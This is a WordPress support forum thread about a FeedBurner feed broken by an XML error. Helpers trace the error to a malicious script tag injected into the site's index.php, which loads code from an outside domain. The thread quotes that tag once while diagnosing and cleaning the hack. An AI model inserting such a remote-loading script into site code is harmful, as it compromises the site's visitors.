WordPress.org

Ready to get started?Download WordPress

Forums

My feedburner is giving me errors. What do i do? (17 posts)

  1. heredia21
    Member
    Posted 2 years ago #

    My feedburner is giving me errors. What do i do?

    Here is a link to my feed: http://feeds.feedburner.com/blackberryempire

    This is the error i am getting:

    This page contains the following errors:

    error on line 426 at column 1: Extra content at the end of the document
    Below is a rendering of the page up to the first error.

  2. When did it start happening? Have you tried turning off plugins?

  3. heredia21
    Member
    Posted 2 years ago #

    Yes i turned off all plugins still doesnt work. I am not sure when it started happening until someone mentioned it to me today

  4. Turn off the FeedBurner redirect and see if your site works without that. URL would be yourdomain.com/feed if you have pretty permalinks on.

  5. heredia21
    Member
    Posted 2 years ago #

    Just tried that. Same error
    This page contains the following errors:

    error on line 426 at column 1: Extra content at the end of the document
    Below is a rendering of the page up to the first error.

  6. It still redirects me to feedburner, but I'll trust you did it ;)

    Have you tried with a different theme?

  7. heredia21
    Member
    Posted 2 years ago #

    No i havent tried different theme. What else could be the issue?

  8. Generally you get these options:

    1) Something in your theme
    2) A plugin
    3) Something in a post

  9. debajyoti
    Member
    Posted 2 years ago #

    You have this malicious script "script language="javascript" SRC="http://superpuperdomain2.com/count.php?ref=" in your index.php.
    "IGIT related post with thumb image after post" is the plugin causing this problem. Remove the whole plugin and read below for more details about how to clean your site from all those malicious files.

    1. RSS Feed Crash
    2. ATTENTION: IGIT Related Posts With Thumb Image After Posts phpRemoteView Attack
    3. Feedburner RSS Feed link broken

  10. heredia21
    Member
    Posted 2 years ago #

    Hmm i dont have the IGIT related post plugin. Do i remove that javascript?

  11. heredia21
    Member
    Posted 2 years ago #

    debajyoti i removed that script from index.php and i am getting this
    This page contains the following errors:

    error on line 353 at column 1: Extra content at the end of the document
    Below is a rendering of the page up to the first error.

  12. What plugins DO you have?

  13. heredia21 - Flush your WP SuperCache now that you've made that change.

    AND if you can turn off, and LEAVE off, the part of your feedburner hook up that redirects the feed (so we can look at your feed directly) that could help.

    ETA: And turn off SUperCache for RSS. I believe there's a setting to NOT cache RSS feeds.

  14. heredia21
    Member
    Posted 2 years ago #

    I have the nRelate plugin

  15. heredia21
    Member
    Posted 2 years ago #

    Ok I have disabled feedburner plugin. I can now view my feed now. How can I get feedburner to work?

  16. heredia21
    Member
    Posted 2 years ago #

    Works now! Thanks a lot of your help guys. How did I get that malicious script in there?

  17. heredia21 - Most likely a server level insecurity or a virus on your PC. Read http://codex.wordpress.org/FAQ_My_site_was_hacked and start with a change of every password related to your site.

    debajyoti - It's starting to put your 'this plugin is evil' in a new light. I think it's more likely someone's targeting that plugin folder for some reason.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags